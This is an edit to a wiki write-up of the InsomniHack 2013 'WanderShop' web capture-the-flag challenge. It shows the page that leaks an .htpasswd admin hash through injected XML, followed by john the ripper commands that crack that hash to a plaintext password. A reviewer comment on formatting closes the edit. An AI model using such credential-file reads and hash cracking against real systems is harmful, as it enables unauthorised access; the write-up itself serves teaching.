Changes

InsomniHack-2013/Web2/WanderShop

695 bytes added, 11:00, 26 March 2013
/* Solution */
</pre>
* The result of the XML is parsed and displayed in the paying page, so we put the content of the .htpasswd file in an item element which will be displayed in the table.
* Here's the HTML result
<pre>
<!DOCTYPE html>
<html lang="en">
<head>
<title>Wander Shop</title>
<link rel="StyleSheet" href="css/bootstrap.min.css" type="text/css"/>
<script src="js/bootstrap.min.js"></script>
</head>
<body>
<div class="container">
<h1>Wander Shop</h1>
Verify your cart:<table class='table table-condensed'><tr><td>admin:sQcHhNWX6v1VM
</td><td>x</td><td>asd</td></tr></table>
<form action="pay.php">
<input type="submit" value="Pay"/>
</form>
</div>
</body>
</html>
</pre>
* The password is in CRYPT format, which is easily bruteforced with john the ripper
echo 'admin:sQcHhNWX6v1VM' > /tmp/pass
john /tmp/pass
>slamas (admin)
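Review bot: the last bullet's two commands and the john output line follow it with no <pre> wrapper in the visible lines, unlike the HTML result above, so the leading ">" on ">slamas (admin)" reads as part of the command sequence rather than as tool output. Suggest wrapping those three lines in <pre>...</pre> and separating the output from the commands. "CRYPT format" could also be stated more precisely: the 13-character value after "admin:" is the traditional DES-based crypt(3) form, which explains why the bullet calls it easily bruteforced. The first bullet says the .htpasswd content was put in an item element but does not show the XML that was submitted; a short excerpt of that request before "Here's the HTML result" would make the step reproducible for readers of the write-up.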
ControlGroup, administrator